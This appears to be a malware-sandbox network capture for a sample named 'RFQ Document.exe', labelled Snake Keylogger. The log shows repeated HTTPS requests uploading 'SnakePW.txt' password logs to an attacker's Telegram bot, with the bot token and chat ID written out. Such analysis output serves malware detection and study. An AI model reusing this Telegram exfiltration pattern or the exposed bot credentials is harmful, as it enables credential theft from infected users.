                                            2021-09-28 05:59:11 UTC283OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 30 33 37 34 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e0374e0eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:11 UTC283INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:11 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:11 UTC284INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12766,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808751,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            178192.168.2.449999149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:11 UTC284OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e05df84b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:11 UTC285OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 30 35 64 66 38 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e05df84bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:12 UTC285INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:12 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:12 UTC285INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12767,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808752,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            179192.168.2.450000149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:12 UTC286OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e08abe89
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:12 UTC286OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 30 38 61 62 65 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e08abe89Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:12 UTC287INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:12 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:12 UTC287INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12768,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808752,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            18192.168.2.449792149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:24 UTC28OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c3f5b542
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:24 UTC28OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 66 35 62 35 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c3f5b542Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:24 UTC29INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:24 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:24 UTC29INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12598,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808704,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            180192.168.2.450001149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:12 UTC288OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e0a9c32a
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:12 UTC288OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 30 61 39 63 33 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e0a9c32aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:12 UTC288INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:12 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:12 UTC289INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12769,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808752,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            181192.168.2.450002149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:12 UTC289OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e0c8baa8
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:12 UTC290OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 30 63 38 62 61 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e0c8baa8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:12 UTC290INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:12 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:12 UTC290INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12770,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808752,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            182192.168.2.450003149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:12 UTC291OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e0e55880
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:12 UTC291OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 30 65 35 35 38 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e0e55880Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:12 UTC292INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:12 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:12 UTC292INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12771,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808752,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            183192.168.2.450004149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:12 UTC292OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e104567b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:12 UTC293OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 30 34 35 36 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
